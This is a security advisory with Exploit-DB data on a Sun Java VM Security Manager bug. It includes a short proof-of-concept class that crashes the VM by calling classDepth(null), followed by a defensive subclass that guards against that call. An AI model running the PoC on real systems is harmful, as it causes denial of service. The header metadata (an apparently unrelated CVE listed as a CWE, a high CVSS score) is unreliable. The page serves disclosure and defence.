Java Virtual Machine Security Manager Vulnerability
Vendor: Java Virtual Machine
By: Marc Schoenefeld
CVSS: 8.5 (HIGH)
CWE: 20
Product Name: Java Virtual Machine
Affected Version From: Java Virtual Machine 1.3.1
Affected Version To: Java Virtual Machine 1.4.1
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: o:sun:java_virtual_machine
Platforms Tested: Windows, Linux, Mac
2002

A vulnerability exists in the Sun Microsystems Java Virtual Machine when implementing the Security Manager. An attacker can exploit this vulnerability to crash the virtual machine by creating a class that extends the SecurityManager class and calling the classDepth() method with a null argument.

Mitigation:

Sun has released a patch to address this vulnerability.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8892/info

A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine. 

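/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {

    public void doit() {
        System.out.println("doit");
        // classDepth(String) is a protected, deprecated SecurityManager method;
        // passing null is the call the advisory reports as crashing the JVM.
        int o = classDepth(null);
    }

    public static void main(String[] a) {
        // Instantiate the subclass directly and trigger the call.
        InSecurityManager m = new InSecurityManager();
        m.doit();
    }
}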
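
For code that has to keep running on an affected JVM, the missing argument check can be applied in the subclass before the call reaches the JVM's own method. This is an added example, not part of the original advisory or of the vendor patch; the names GuardedSecurityManager and depthOf are hypothetical, and it assumes a JDK from the affected range where classDepth(String) is still present.

```java
// Added example (not from the advisory or the vendor patch).
// Assumes an affected-era JDK (1.3.1 to 1.4.1) where the deprecated
// SecurityManager.classDepth(String) still exists.
// GuardedSecurityManager and depthOf are hypothetical names.
public class GuardedSecurityManager extends SecurityManager {

    // Reject null in Java code so it is never handed to the
    // inherited SecurityManager.classDepth() implementation.
    protected int classDepth(String name) {
        if (name == null) {
            throw new NullPointerException("classDepth: class name is null");
        }
        return super.classDepth(name);
    }

    // Public entry point so callers outside the class hierarchy
    // also pass through the guard.
    public int depthOf(String name) {
        return classDepth(name);
    }

    public static void main(String[] args) {
        GuardedSecurityManager m = new GuardedSecurityManager();

        // Same call shape as the demonstration class, now stopped early.
        try {
            m.depthOf(null);
            System.out.println("unexpected: null was accepted");
        } catch (NullPointerException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // A real class name still reaches the original method.
        int depth = m.depthOf(GuardedSecurityManager.class.getName());
        System.out.println("stack depth of guard class: " + depth);
    }
}
```

The guard covers only calls made through this subclass; other SecurityManager subclasses on an unpatched JVM still reach the unchecked method, so the vendor patch remains the fix.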